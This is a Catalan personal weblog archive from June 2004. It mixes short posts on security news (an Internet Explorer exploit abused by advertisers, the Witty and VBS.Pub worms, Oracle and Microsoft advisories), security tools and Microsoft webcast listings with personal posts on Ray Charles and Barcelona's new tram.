The exploit is launched when a user clicks on a malicious link in an e-mail or web page. Internet Explorer launches a pop-up window with an "iframe" tag, which is commonly used to display text or interactive features in a floating window. The code tricks the browser into thinking the iframe contains a help file from the user's hard drive, while downloading a javascript that can then run with local privileges. The javascript then launches a remote php file, which in turn downloads a trojan to the user's hard drive. A complete analysis of the exploit and how it works can be found here.
|
07:01 (# Enllaç permanent) ()
|
|
 Acabo de veure a la BBC que Ray Charles, una autèntica llegenda del Rhythm&Blues ha mort avui als 73 anys.
Personalment recordo, com moltissima gent, la versió de la cançó «Georgia on my mind» (encara que personalment m'agrada més la versió feta per Van Morrison) i la seva participació a la pel·lícula «The Blues Brothers».
|
00:02 (# Enllaç permanent) ()
|
|
|
dijous, 10 / juny / 2004 |
[Geek.com] Advertisers exploit IE flaw to push advertising. Hi ha una vulnerabilitat a l'Internet Explorer per la qual encara no hi ha pegat. Algunes empreses de publicitat s'han aprofitat d'això per instal·lar un troià a les màquines dels usuaris i que força la visita a determinades pàgines web.
|
23:55 (# Enllaç permanent) ()
|
|
 Jon Udell avui parla al seu weblog d'una web que em penso es convertirà en un lloc de referència: fixyourownprinter.com explica com un usuari pot solucionar ell mateix els problemes més habituals de les impressores...  i ho ha fa amb vídeos i instruccions pensades pels usuaris finals. La única pega: els vídeos s'han de comprar.
|
22:58 (# Enllaç permanent) ()
|
|
[Linux Gazette] Tutorial de VIM. Segons indiquen, editar un fitxer amb el VI pot ser un malson pels usuaris novells dels sistemes Unix...  però és innegable (IMHO) que aprendre el funcionament bàsic de VI és imprescindible, ja que és l'únic editor que tenim la garantia que estarà present a virtualment qualsevol sistema (ho sento Jesús, però l'Emacs segur que no hi és).
|
22:09 (# Enllaç permanent) ()
|
|
Weplab és una eina per verificar la seguretat del xifrat WEP d'una xarxa sense fil, des d'un punt de vista educatiu. Permet realitzar diversos atacs de forma que es poden comprovar l'efectivitat del correu brossa i els mínims requeriments per a cada un. Weplab funciona sota Linux.
|
21:58 (# Enllaç permanent) ()
|
|
Una de les preguntes més habituals que m'acostumen a fer, quan estic treballant amb màquines Sun, és: 'quants processadors té aquesta màquina' o 'quanta RAM'.
Fins ara ho solucionava executant /usr/sbin/prtconf i 'navegant' pel resultat (massa informació)... Avui he descobert una forma més neta i còmoda d'obtenir aquesta informació:/usr/platform/`uname -i`/sbin/prtdiag -v
O, simplificant,/usr/sbin/prtdiag -v
que correspon a un script que executa la línia d'ordres completa.
El resultat d'això és una descripció molt acurada de la configuració hardware d'una màquina Sun... per exemple, podeu veure la configuració d'un Blade 150. Hi ha tota la informació que et habitualment pregunten: processador, RAM, nombre de DIMM... i d'altres també prou interessants: temperatura, versions de la PROM, etc...
|
15:40 (# Enllaç permanent) ()
|
|
|
dimecres, 9 / juny / 2004 |
[Infosec Writers] The need for Security Testing explica, a un nivell molt general adreçat al personal directiu de les empreses, que són les proves de seguretat i com la metodologia OSSTMM (Open Source Security Testing Methodology Manual) pot ajudar a millorar el nivell de seguretat d'una organització.
|
23:01 (# Enllaç permanent) ()
|
|
[ComputerWorld] The Witty worm: A new chapter in malware és un excel·lent article de Bruce Schneier, demostrant que és el primer cuc «sofisticat» amb una elevada propagació a la xarxa... i que va fer la feina d'infecció en només 45 minuts. En veurem més els propers mesos i anys.
Witty was wildly successful. Twelve thousand machines was the entire vulnerable and exposed population, and Witty infected them all -- worldwide -- in 45 minutes. It's the first worm that quickly corrupted a small population. Previous worms targeting small populations such as Scalper and Slapper were glacially slow.
Witty was speedily written. Security company eEye Digital Security discovered the vulnerability in ISS's BlackICE/RealSecure products on March 8, and ISS released a patched version on March 9. EEye published a high-level description of the vulnerability on March 18. On the evening of March 19, about 36 hours after eEye's public disclosure, the Witty worm was released into the wild.
Witty was very well written. It was less than 700 bytes long. It used a random-number generator to spread itself, avoiding many of the problems that plagued previous worms. It spread by sending itself to random IP addresses with random destination ports, a trick that made it easier to sneak through firewalls. It was -- and this is a very big deal -- bug-free. This strongly implies that the worm was tested before release.
Witty was released cleverly, through a bot network of about 100 infected machines. This technique has been talked about before, but Witty marks the first time we've seen a worm do it in the wild. This, along with the clever way it spread, helped Witty infect every available host in 45 minutes.
Witty was exceptionally nasty. It was the first widespread worm that destroyed the hosts it infected. And it did so cleverly. Its malicious payload, erasing data on random accessible drives in random 64KB chunks, caused immediate damage without significantly slowing the worm's spread.
|
22:48 (# Enllaç permanent) ()
|
|
[Netcraft] Symantec: New Virus Deletes All Files. Fins ara estàvem acostumats a rebre (cada dia!) un avís dient que algú havia anunciat l'existència d'un perillós virus, sovint indetectable, que esborrava tots els fitxers del disc dur.
Això sempre havia estat qualificat, fins avui, com una broma... doncs resulta que a partir d'ara ja és una realitat: El cuc VBS.Pub es distribueix en un missatge amb un fitxer .ASP, .HTA, .HTM, .HTT, .HTML, .VBE o .VBS associat. Quan s'executa, infecta les màquines Windows, enviant còpies d'ell mateix a totes les adreces que troba dins de la llibreta d'adreces de l'Outlook.
Però el que més destaca és la seva acció destructora: els dies 6, 13, 21 i 28 de cada mes el cuc esborra tots els fitxers del disc dur de la màquina infectada.
Afortunadament aquest cuc serà difícil que arribi a afectar a molta gent, ja que fa servir un sistema de propagació fàcilment detectable.
|
00:31 (# Enllaç permanent) ()
|
|
[Diari de Barcelona] Les universitats es reforcen
Els experts van concloure que s'ha perdut la batalla de la seguretat total i cal aplicar bé les polítiques de seguretat, les eines de monitorització i d'anàlisi. També van destacar que les organitzacions encara veuen la seguretat com a una molèstia supèrflua i "moltes vegades fa falta un desastre perquè s'adonin" de la importància que té. Per acabar, una persona del públic els va suggerir que "potser no s'haurien d'aplicar tantes solucions policials a les universitats".
|
00:02 (# Enllaç permanent) ()
|
|
|
dimarts, 8 / juny / 2004 |
Reconeixo que aquest weblog es realitza en clar incompliment de la patent 6.745.238 recentment obtinguda per Oracle, Self service system for web site publishing.
|
23:58 (# Enllaç permanent) ()
|
|
També avui el CERT ha publicat un avís sobre l'existència d'una vulnerabilitat a Oracle e-Business Suite que pot ser utilitzada per un atacant remot per a l'execució de codi als servidors que executen una versió vulnerable. L'ús d'aquesta vulnerabilitat pot afectar a les dades emmagatzemades, a la pròpia aplicació de base de dades o, fins i tot, al sistema operatiu de la màquina servidor.
|
23:54 (# Enllaç permanent) ()
|
|
Microsoft ha publicat avui el paquet d'actualitzacions del mes de juny:
- Butlletí MS04-017: Vulnerabilitat al visualitzador web de Crystal Reports inclòs a Visual Studio .NET 2003 i Microsoft Business Solutions CRM. Aquesta vulnerabilitat pot revelar informació sensible.
- Butlletí MS04-016: Vulnerabilitat a DirectPlay que pot ser utilitzada en atacs de denegació de servei. Afecta a Windows 2000 (Service Pack 2 i posteriors), Windows Server 2003 i Windows XP.
|
23:51 (# Enllaç permanent) ()
|
|
 (Foto feta amb el Treo)
Al Centre Comercial l'Illa de Barcelona avui he trobat amb un rellotge que mesura la situació actual de l'ús de l'aigua arreu del món. Amb un conjunt d'alambins, es va movent aigua per omplir un petit dipòsit. A la part inferior es poden veure els marcadors que he fotografiat: la població total, el nombre de persones que no tenen accés a aigua per veure o als serveis sanitaris... i quina seria la situació si des de l'any 2000 s'haguessin aplicat els acords per fer arribar els serveis sanitaris i l'aigua a tota la població.
Els valors d'aquest matí són per tremolar:
| Població mundial |
|
6.355.135.863 |
| Nombre de persones sense |
| Aigua per beure |
Serveis sanitaris bàsics |
|
1.228.019.774 |
2.414.009.887 |
| Nombre de persones sense aquests serveis, en cas d'haver respectat els acords de l'any 2000 |
| Aigua per beure |
Serveis sanitaris bàsics |
|
1.058.023.678 |
2.115.657.246 |
|
21:08 (# Enllaç permanent) ()
|
|
|
dilluns, 7 / juny / 2004 |
PWGen és un generador de contrasenyes amb la capacitat de crear contrasenyes i frases de pas que es poden considerar fortes a nivell criptogràfic. També es pot utilitzar per generar fitxers amb un contingut totalment aleatori. PWGen és una aplicació per a Windows.
|
21:58 (# Enllaç permanent) ()
|
|
SID és un sistema de detecció d'intrusions a nivell de host. Consisteix en un component que s'executi dins de l'espai del nucli i un altre component a nivell d'usuari. La seva tasca és avisar quan detecta una activitat sospitosa a nivell del shell, bé mitjançant una alarma bé executant un programa. SID està disponible per a Solaris 8 (plataformes SPARC i x86) i Linux 2.4.
|
21:54 (# Enllaç permanent) ()
|
|
 (foto feta amb el Treo)
Avui he hagut d'anar per la Diagonal i he vist per primera vegada el Trambaix en funcionament. Ja se que fa força setmanes que està funcionant, però fins ara no he tingut la necessitat d'anar per aquella zona i veure'l.
Haig de dir que, al contrari de la majoria de la gent, jo crec que el tramvia és un excel·lent mitjà de transport i que té molt futur... encara que també haig de dir que la implementació feta a Barcelona em penso que no és la més encertada.
Crec que un dels avantatges del tramvia com transport públic és la seva capacitat de conviure amb la resta de mitjans de transport que circulen pel carrer. Aquest és un dels aspectes que sempre he apreciat més quan he estat en ciutats on hi havia línies de tramvia en funcionament (i on sempre l'he fet servir). En canvi a Barcelona s'ha optat per separar-lo de la resta de vehicles, fent-lo anar per un franja verda d'ús exclusiu pel tramvia.
Possiblement hauria estat més interessant que aquesta àrea dedicada a l'ús del tramvia també pogués ser utilitzada per altres mitjans de transport públic, com l'autobús. D'aquesta forma s'alliberaria la resta de carrils i es permetria un transport públic més fluid. També hi ha gent que es queixa per la velocitat del tramvia; diuen que és molt lent... això també és un punt feble de la implementació feta a Barcelona: l'avantatge del tramvia allà on està en funcionament real sempre és la seva velocitat... i la comoditat per fer transbords amb d'altres línies. Aquest últim punt, evidentment a Barcelona, és inviable.
Una altra cosa que no em convenç és que, posats a separar-lo dins d'aquests carrils verds, per quina raó s'han ficat ben bé al mig de la Diagonal? No hauria estat millor enganxar aquests carrils verds a una de les voreres? Amb això el tramvia seria més proper al vianant i, com a benefici addicional, s'obtindria una separació verda entre el transport rodat i l'àrea de vianants.
Molt em temo que els responsables del disseny del Trambaix van pensar en una línia de metro que, per limitacions econòmiques, no s'ha pogut fer sota terra... i això segurament acabarà amb un nou projecte de mega-obra pública a Barcelona d'aquí cinc o deu anys: el soterrament del Trambaix.
Malgrat aquests aspectes negatius, sempre que tingui l'oportunitat faré servir el Trambaix per davant de qualsevol altra mitjà de transport.
|
21:31 (# Enllaç permanent) ()
|
|
[fernand0] comenta com «El Mundo» i «Periodista Digital» recullen unes declaracions de Phil Zimmermann.
«El Mundo»
CREADOR DEL PGP
Zimmermann: 'Internet ha dado un poder inmenso a los terroristas internacionales'
«Periodista Digital»
Creador de PGP (una fórmula libre de encriptación del correo electrónico) Zimmermann: "Internet ha dado un poder inmenso a los terroristas internacionales"
El que, segons Fernand0, va dir Phil Zimmermann
Internet ha dado un poder inmenso a los individuos y, por tanto, también a los terroristas.
|
00:14 (# Enllaç permanent) ()
|
|
|
diumenge, 6 / juny / 2004 |
[TechUser.Net] Why Windows is a Security Nightmare?
A typical Windows system follows a simple lifecycle: it starts out with a clean Windows installation, which gradually deteriorates as programs are installed, and uninstalled. Eventually, the Windows registry accumulates so much crud that the user is forced to do a clean install. When a user does a clean install that user's system loses all the previously applied security updates, and becomes a sitting duck for worms and other malware.
Things wouldn't be so bad if the user was able to update the new system with security patches painlessly, but Windows Update makes it very hard to do so.
|
23:17 (# Enllaç permanent) ()
|
|
 Què passaria si un dia les vaques es rebel·len i es neguen a continuar sent unes esclaves de la humanitat?
La resposta a Cows with Guns (requereix Flash... no oblideu de pujar una miqueta el volum de la targeta de so).
|
23:13 (# Enllaç permanent) ()
|
|
[The New York Times] Proceed With Caution és un reportatge dedicat a Bill Joy, co-fundador de Sun i que fa uns mesos va abandonar la companyia.
Bill Joy és possiblement el Bill que més ha influenciat la informàtica. Dues proves que extrec del reportatge de The New York Times:
Much of the present-day Internet is built upon the Unix code Joy wrote in the 1970's when he was a grad student at Berkeley; after that, his signature inventions shaped the Java programming language and the Sun computer servers that power a good portion of the Web.
I ara sembla que Google el tempta:
Bill Joy recently flirted with the idea of taking a job at Google.
O Google o bé una altra start-up. El seu objectiu és treballar en quelcom relacionat amb al tecnologia, però d'aquella que sense la seva intervenció directa no es pot fer realitat.
De totes formes, també demostra que sap gastar els diners:
At his house in Aspen one afternoon, Joy went downstairs to help his 8-year-old daughter choose a movie to watch. Joy is a film buff, and he recently outfitted his basement with a spectacular home entertainment system. He also happens to be a bibliophile, so he bought three handbooks -- ''Halliwell's Film Guide,'' Pauline Kael's ''5001 Nights at the Movies'' and the ''Time Out Film Guide'' -- to compare reviews. ''I was going through the books and found out there are only about 2,000 movies in history in which there's critical consensus that they're really good,'' he told me. ''So I bought 600 of them.'' No bad movies, fewer possible bad outcomes.
Aquesta anècdota l'ha resaltada en Jesús Corrius, que també és un cinèfil --jo sóc un consumidor de cinema de massa i no vaig massa sovint al cinema. De fet la última pel·lícula que he vist és la passió de crist, ja fa unes quantes setmanes.
|
21:26 (# Enllaç permanent) ()
|
|
Preguntes i respostes sobre el framework criptogràfic inclòs a Solaris 10.
Q: What is the Solaris Cryptographic Framework?
A: It is a user and kernel space set of APIs (Application Programming Interfaces) and SPIs (Service Provider Intefaces) for providing software and hardware cryptographic algorithms to application and other kernel systems.
|
21:07 (# Enllaç permanent) ()
|
|
El CIS (Center for Internet Security) ha publicat recentment una actualització dels seus benchmark i eines per a la revisió de la configuració de la seguretat del gestor de base de dades Oracle (versions 8i i 9i).
Els benchmark del CIS és una eina que permet comprovar la configuració del producte i extreure els valors de seguretat, comparant-los amb aquells valors que es consideren com òptims per a la seguretat. D'aquesta forma es pot fer una avaluació ràpida de quin és l'estat de la seguretat i revisar aquest resultat amb l'estàndard per determinar quin són els canvis que cal realitzar.
|
19:16 (# Enllaç permanent) ()
|
|
Bootdisk.com: els disquets d'arranc de diversos sistemes operatius: les diferents versions de DOS, Windows, mini-distribucions de Linux... Molts dels disquets inclouen diverses eines que poden ser d'utilitat en la recuperació dels discos que donen errors.
|
19:11 (# Enllaç permanent) ()
|
|
L'empresa on des de fa tres setmanes treballo es distribuïdora del servei d'avisos de seguretat informàtica de Symantec. El nom comercial és DeepSight Alert Services i és l'hereu del servei que oferia SecurityFocus (empresa que va ser adquirida per Symantec ara fa cosa d'un any).
Fins ara mai no havia tingut mai accés a cap servei «professional» d'aquesta mena (quan em refereixo a professional vull dir un servei de subscripció) i haig de dir que estic senzillament impressionat per la qualitat dels avisos que es reben, amb una gran quantitat d'informació i referències.
L'accés al servei de notificació es via email (es reben les alertes) i també via web, on es poden consultar els avisos que s'ajusten al perfil de la subscripció. El format de distribució són fitxers PDF.
Per a cada avís s'indica de forma ràpida l'impacte (en una puntuació potser una mica exagerada), si es pot utilitzar de forma remota, l'existència d'exploits i algunes dades més.
Però el principal valor d'aquestes notícies és justament el que continua: els sistemes vulnerables, una descripció ràpida, l'impacte de la vulnerabilitat, una completa descripció tècnica, els escenaris on aquesta vulnerabilitat pot ser aprofitada, l'existència d'exploits, estratègies per reduir l'impacte de la vulnerabilitat, solucions i una gran quantitat de referències.
Considero que aquest servei és molt valuós i que totes les organitzacions haurien de considerar seriosament fer-lo servir. No només pel temps que s'estalvien en la consulta a llocs de referència de seguretat, sinó per l'agrupació de tota la informació que sovint està disponible de forma separada.
|
18:14 (# Enllaç permanent) ()
|
|
[Avui] TV3 i Catalunya Ràdio, article de Jordi Pujol.
Seria una pena que el que la Comissió de Brussel·les i el comissari Monti varen entendre no ho entengués el govern de Catalunya.
|
14:45 (# Enllaç permanent) ()
|
|
[CXOToday.com] Software Tricks RAM to Extract Credit Card Info
Sensitive information such as password or credit card number once entered in a computer are no longer safe, thanks to a new software tool called TaintBochs, which can track sensitive information through computer memory.
Developed by Tal Garfinkel and colleagues from Stanford University in Palo Alto, California, TaintBochs is capable of analyzing sensitive data handling in several large, real world applications. Among these were Mozilla, Apache, and Perl, which are used to process millions of passwords, credit card numbers, etc., on a daily basis.
|
00:32 (# Enllaç permanent) ()
|
|
|
dissabte, 5 / juny / 2004 |
Microsoft realitzarà durant aquest mes de juny un bon grapat de de webcasts sobre temes de seguretat:
Pels directius
- Microsoft Executive Circle Webcast: Monthly Update from Microsoft's VP for Security - Level
22 de juny
17.30 a 20.30 hores (Barcelona)
Mike Nash, VP Security Business Unit, Microsoft Corporation
Join Mike Nash, Microsoft’s senior executive in charge of security, for his monthly security update. Mike will provide the latest details on Microsoft’s security enhancements, offer tips and insights into key security strategies for customers and provide new information on Microsoft's security technologies being delivered in upcoming service packs.
http://go.microsoft.com/fwlink/?LinkId=28964
Pels professionals de la seguretat
- Implementing Server Security on Windows 2000 and Windows 2003 (Part 1) - Securing Servers: Core Server Security and Active Directory Security - Level 200
8 de juny
18.00 a 18.45 hores (Barcelona)
Mark Mortimore, Senior Technical Specialist, Microsoft Corporation
This webcast discusses and explains the importance of server security to your organization. We will explore core server security and the key components in the process of securing Active Directory®. We will then discuss some of the challenges small-to-medium sized businesses face when trying to secure a server environment, the importance of multiple layers of security, managing software updates, and how to use Active Directory to secure your server environment. This webcast includes a demonstration on how to create an Organizational Unit structure and apply a security template.
http://go.microsoft.com/fwlink/?LinkId=29281
- Implementing Client Security on Windows 2000 and Windows XP (Part 1) - Core Client Security, Securing Applications and Group Policy for Standalone Clients - Level 200
8 de juny
20.00 a 20.45 hores (Barcelona)
Mark Mortimore, Senior Technical Specialist, Microsoft Corporation
This webcast discusses the importance of implementing a core client security, concentrating on securing applications and securing standalone Windows® clients. We will discuss a fundamental, core set of client security topics along with securing a variety of applications such as Internet Explorer and Microsoft® Outlook® within an organization. From there we’ll discuss how to use Active Directory® and Group Policy to secure Windows clients. The presentation includes a demonstration on Securing Standalone Clients.
http://go.microsoft.com/fwlink/?LinkId=29849
- IIS 6.0: Built for Stability - Level 200
8 de juny
20.30 a 22.30 hores (Barcelona)
Don Jones, Book Author and Founding partner of BrainCore.Net, BrainCore.Net
Sure, IIS 6.0 has a new architecture, and you may have heard about http.sys, application pools, Web gardens, and more, but what does it all mean, and why should you care? Join this Webcast and see what the new IIS architecture offers Web server administrators, and learn how to build Web servers than can survive the most challenging designs your Web developers can throw at it!
http://go.microsoft.com/fwlink/?LinkId=25234
- Information about Microsoft's June Security Bulletins - Level 200
9 de juny
19.00 a 20.00 hores (Barcelona)
Christopher Budd, CISM, CISSP/Security Program Manager and Debby Fry Wilson, Director/Security Response Marketing
On June 8, Microsoft will release its monthly security bulletins. Join us for a brief overview of the technical details of the June security bulletins followed by an extensive Q&A session.
This webcast will focus on addressing your questions and concerns about the security bulletins. Therefore, the majority of the webcast session will give you the opportunity to ask questions and get answers from our security experts.
http://go.microsoft.com/fwlink/?LinkId=28770
- Security Patch Management Tools (Part 1) - Windows and Office Update - Level 200
9 de juny
20.00 a 20.45 hores (Barcelona)
Kai Axford, TechNet Presenter, Microsoft Corporation
How are you evaluating, distributing, and installing software patches? This webcast discusses the importance of patch management and establishing a patch management process using Windows and Office Update as a patch management tool in your environment. We will present a brief overview of the patch management landscape, focusing on the role of Windows and Office Update as one of your patch management tools. From there this webcast will walk you through a demonstration on Configuring Automatic Windows Update.
http://go.microsoft.com/fwlink/?LinkId=29871
- Essentials of Security (Part 1) - Security and Defense - Level 200
14 de juny
18.30 a 18.45 hores (Barcelona)
Shawn Travers, SST TechNet Presenter, Microsoft Corporation
How does a security plan affect the commerce of the business it is supposed to protect? How can you be sure your security plan implements the right kind of security for each type of vulnerability? This webcast presents a defense-in-depth model that can help provide protection for each layer of an infrastructure. The discussion also includes strategies for security response, common attack scenarios, and best practices. During this webcast we will walk through two demonstrations: Internet Connection Firewall and Protecting IIS 5.0.
http://go.microsoft.com/fwlink/?LinkId=29329
- Implementing Network and Perimeter Security - Level 300
14 de juny
20.00 a 21.30 hores (Barcelona)
Byron Hynes, Consultant, Market Star
In this session for experienced IT professionals, you will build on existing knowledge of server and client security and learn how to apply best practices to implement perimeter and network defenses. The session will discuss the use of hardware and software firewalls for network and application filtering and how to implement intrusion detection mechanisms. You will also learn how to increase security for wireless network access through the use of encryption and password authentication protocols.
http://go.microsoft.com/fwlink/?LinkId=29394
- Implementing Server Security on Windows 2000 and Windows 2003 (Part 2) - Hardening Member Servers and Hardening Domain Controllers - Level 200
15 de juny
18.00 a 18.45 hores (Barcelona)
Mark Mortimore, Senior Technical Specialist, Microsoft Corporation
This webcast addresses implementing security on many different types of servers found in a Windows 2000 Server and Windows Server 2003 environment and practical information on how to harden domain controllers. We will provide recommendations and practical information about how to harden servers in general and how to harden member servers, in particular. During this webcast we will see two demonstrations on using MBSA and Hardening Domain Controllers.
http://go.microsoft.com/fwlink/?LinkId=29399
- Implementing Client Security on Windows 2000 and Windows XP (Part 2) - Securing Your Environment with Active Directory - Level 200
15 de juny
20.00 a 20.45 hores (Barcelona)
Mark Mortimore, Senior Technical Specialist, Microsoft Corporation
This webcast will cover the role of Active Directory® in securing network clients and how to leverage Group Policy as a tool to enhance network security. Learn how to use Group Policy to standardize user permissions, simplify administration, and ensure consistent access and security standards. This webcast will also will walk you through two demonstrations with prescriptive information on how to modify Active Directory for client security and how to use Group Policy.
http://go.microsoft.com/fwlink/?LinkId=29874
- Security Patch Management Tools (Part 2) - MBSA and SUS - Level 200
16 de juny
20.00 a 20.45 hores (Barcelona)
Kai Axford, TechNet Presenter, Microsoft Corporation
How are you evaluating, distributing, and installing software patches? This webcast reviews the importance of patch management and establishing a patch management process using the Microsoft® Baseline Security Analyzer (MBSA) and Software Update Services (SUS) as a patch management tool in your environment. Using these tools as part of a patch management strategy can benefit your organization in many ways, ultimately improving efficiency and saving time and money. Used properly, they can prevent downtime, loss of data, and other costly problems resulting from an improperly patched infrastructure. Join this webcast to find out how.
http://go.microsoft.com/fwlink/?LinkId=29882
- Essentials of Security (Part 2) - Security Risk Management Discipline - Level 200
21 de juny
18.00 a 18.45 hores (Barcelona)
Shawn Travers, SST TechNet Presenter, Microsoft Corporation
So maybe you've heard of Security Risk Management Discipline (SRMD), but what is it exactly, what does it entail, and how do you implement it? This webcast will introduce you to SRMD and discuss its three primary processes: assessment, development, and implementation and operation. Then we go into extensive detail on the SRMD processes, their use and implementation, and best practices. We’ll also walk you through two demonstrations: Encrypting Network Traffic and Securing Data on a Disk. Join this webcast to learn not only the benefits of SRMD, but how to get the most out of it.
http://go.microsoft.com/fwlink/?LinkId=29891
- Implementing Server Security on Windows 2000 and Windows 2003 (Part 3) - Hardening Servers for Specific Roles and for Standalone Use - Level 200
22 de juny
18.00 a 18.45 hores (Barcelona)
Mark Mortimore, Senior Technical Specialist, Microsoft Corporation
You already know that hardening the servers in your infrastructure would improve efficiency and security, but how to do it? This webcast discusses hardening both role-specific and standalone servers. In discussing hardening of servers for specific roles, we will review the importance of applying the appropriate security templates and manually configuring server settings for the role. We will then discuss how to harden standalone servers using Security Configuration and Analysis or Secedit to apply security settings. This webcast will present two demonstrations on hardening servers for specific roles, and on hardening a stand-alone server.
http://go.microsoft.com/fwlink/?LinkId=29905
- Implementing Client Security on Windows 2000 and Windows XP (Part 3) - Software Restriction, Antivirus and Client Firewalls - Level 200
22 de juny
20.00 a 20.45 hores (Barcelona)
Mark Mortimore, Senior Technical Specialist, Microsoft Corporation
Is your client-side security program effective and up-to-date? This webcast discusses important client defense strategies based on software restriction policies, antivirus software and client firewalls. Learn how a software restriction policy can improve client-side reliability and IT staff productivity, the importance of antivirus software and the cost-saving role it can play with a centralized deployment, and the need for client firewalls and the variety of firewall options available. This webcast also features two demonstrations: applying a software restriction policy and enabling the client firewall.
http://go.microsoft.com/fwlink/?LinkId=29912
- Applied Security Strategies - Level 300
23 de juny
18.00 a 18.30 hores (Barcelona)
Byron Hynes, Consultant, Market Star
In this session for experienced IT professionals, you will build on existing knowledge of server and client security and learn how to apply best practices to implement perimeter and network defenses. The session will discuss the use of hardware and software firewalls for network and application filtering and how to implement intrusion detection mechanisms. You will also learn how to increase security for wireless network access through the use of encryption and password authentication protocols.
http://go.microsoft.com/fwlink/?LinkId=29916
- Security Patch Management Tools (Part 3) - SMS with the SUS Feature Pack - Level 200
23 de juny
20.00 a 20.45 hores (Barcelona)
Kai Axford, TechNet Presenter, Microsoft Corporation
Do you have an effective, comprehensive patch management strategy? Do you know when to use Systems Management Server (SMS) and when to use Software Update Services (SUS)? In this webcast we will discuss using SMS and the SUS Feature Pack as patch management tools in your environment and how they fit into a comprehensive patch management strategy. SMS and SUS offer different advantages and benefits to an organization. This webcast will review their different capabilities and how they contribute to a secure infrastructure.
http://go.microsoft.com/fwlink/?LinkId=29917
- Mitigation Best Practices - Level 200
24 de juny
22.00 a 23.30 hores (Barcelona)
Jesper Johansson, Security Program Manager, Microsoft Corporation
In a perfect world, everything is patched and up-to-date. But what if you have security vulnerabilities, a worm is on the loose, and deploying the patches would be too risky or time-consuming? Welcome to the security practice of "mitigation." In this webcast you will learn how mitigating measures can be used to minimize the impact of security problems in situations where you cannot install patches immediately. The discussion also shows how to analyze various scenarios to determine when and whether mitigation is appropriate for a given situation.
http://go.microsoft.com/fwlink/?LinkId=29918
- Passwords Demystified - Level 200
25 de juny
22.00 a 23.30 hores (Barcelona)
Jesper Johansson, Security Program Manager, Microsoft Corporation
How does Windows handle, store, and use passwords? How are passwords attacked? This webcast discusses these vital password topics as they apply to Windows systems. Join this webcast to hear from a true expert in the field – Dr. Johannson – as he covers everything you wanted to know about how passwords are managed in Windows.
http://go.microsoft.com/fwlink/?LinkId=29919
Pels programadors
- .NET Framework Security (Part 1) - Features and Cryptography - Level 300
7 de juny
22.00 a 23.30 hores (Barcelona)
Dan Fox, Technical Director, Quilogy
Are you aware of the application security and cryptography features available to you through Microsoft® .NET Framework? This webcast begins with an overview of these features, including Buffer overrun protection, Arithmetic error trapping and Isolated Storage. From there we provide a review of cryptography and discuss the encryption features and tools that .NET offers the developer, such as Symmetric and Asymmetric Encryption. The webcast includes two encryption-related demonstrations: Investigating .NET Data-Type Safety Using the Checked Keyword and Performing Symmetric Encryption Signing Data.
http://go.microsoft.com/fwlink/?LinkId=29512
- Essentials of Application Security (Part 2) - Authentication - Level 300
9 de juny
18.00 a 18.45 hores (Barcelona)
Mark D. Scott, Senior Software Engineer, RDA Corporation
This webcast is the second of a 3-part series about the importance of Application Security and its best practices and guidelines. This part specifically addresses Authentication in the context of secure application development. After an overview of the costs of inadequate security and the benefits of developing secure applications, we concentrate on Authentication as part of a larger security solution, examining specific Authentication techniques and best practices in IIS. The webcast includes two demonstrations: Buffer Overruns and IIS Authentication Techniques.
http://go.microsoft.com/fwlink/?LinkId=29860
- Writing Secure Code - Best Practices - Level 300
11 de juny
22.00 a 23.30 hores (Barcelona)
Joel Semeniuk, VP of Software Development, ImagiNET Resources Corp.
In this webcast for experienced developers, you will learn established best practices for applying security principles throughout the development process. We will discuss common security threats faced by application developers, such as buffer overruns, cross-site scripting and denial of service attacks, and you will learn effective strategies to defend against those threats.
http://go.microsoft.com/fwlink/?LinkId=29284
- .NET Framework Security (Part 2) - Code Access and Role-Based Security - Level 300
14 de juny
22.00 a 23.30 hores (Barcelona)
Dan Fox, Technical Director, Quilogy
Are you aware of the code access and role-based security features available to you through Microsoft® .NET Framework? This webcast delves into Framework’s many code access security concepts, including evidence-based security, partial trust applications, and Sandboxing privileged code. From there we will cover role-based security within the .NET Framework, such as authentication and authorization, creating generic identities and principals, and imperative and declarative security checks. This webcast features two important and useful demonstrations: Using the .NET Framework Configuration Tool, Performing Security Checks and Requesting Permissions; and Using Windows Role-Based Security and Using Generic Role-Based Security.
http://go.microsoft.com/fwlink/?LinkId=29869
- Essentials of Application Security (Part 3) - Authorization - Level 300
16 de juny
18.00 a 18.45 hores (Barcelona)
Mark D. Scott, Senior Software Engineer, RDA Corporation
This webcast is the third of a 3-part series about the importance of Application Security and its best practices and guidelines. This part specifically addresses Authorization in the context of secure application development. After an overview of the costs of inadequate security and the benefits of developing secure applications, we concentrate on Authorization as part of a larger security solution, examining Trusted Subsystem Model Authorization techniques and best practices. The webcast includes two demonstrations: Buffer Overruns and Trusted Subsystem Model Authorization Techniques.
http://go.microsoft.com/fwlink/?LinkId=29877
- Writing Secure Code - Threat Defense - Level 300
18 de juny
18.00 a 19.30 hores (Barcelona)
Joel Semeniuk, VP of Software Development, ImagiNET Resources Corp.
In this session for experienced developers, you will build upon existing knowledge of secure coding best practices to learn about analyzing, mitigating and modeling threats. The session will discuss established threat modeling methodologies and tools and show how they can be applied with other best practices to minimize vulnerabilities and limit damage from attacks.
http://go.microsoft.com/fwlink/?LinkId=29889
- .NET Framework Security (Part 3) - ASP .NET Web Applications and Services - Level 300 21 de juny
22.00 a 22.45 hores (Barcelona)
Dan Fox, Technical Director, Quilogy
Are you aware of the security issues for Microsoft® ASP.NET Web applications, and the application security features available to you through Microsoft .NET Framework? This webcast begins by laying out the security issues for Microsoft ASP.NET Web applications. From there we’ll enumerate the security issues for Web services, and then delve into the Web Service Enhancements for security. This webcast features two important and useful demonstrations: Configuring Forms Authentication and Using Validation Controls and Implementing Security for a Web Service.
http://go.microsoft.com/fwlink/?LinkId=29900
Informació addicional
|
22:50 (# Enllaç permanent) ()
|
|
[Netcraft] Wikis: The Next Frontier for Spammers?: com, després dels weblogs, els wikis es poden convertir en un nou mecanisme per a la difusió de l'SPAM:
Wiki maintainers can expect an increase in spam after a webmaster newsletter highlighted the effectiveness of Wiki spam in raising a site's Google ranking. WebProNews described how a webmaster improved his rank in a search engine optimization (SEO) contest using links in Wiki "sandboxes" - pages where users are urged to test drive the format and learn how to use it.
|
22:35 (# Enllaç permanent) ()
|
|
[eBCVG.COM] What Exactly Is Computer Forensics?
Computer forensics involves the preservation, identification, extraction, documentation and interpretation of computer data. It is often more of an art than a science, but as in any discipline, computer forensic specialists follow clear, well-defined methodologies and procedures, and flexibility is expected and encouraged when encountering the unusual. It is unfortunate that computer forensics is sometimes misunderstood as being somehow different from other types of investigations.
|
22:30 (# Enllaç permanent) ()
|
|
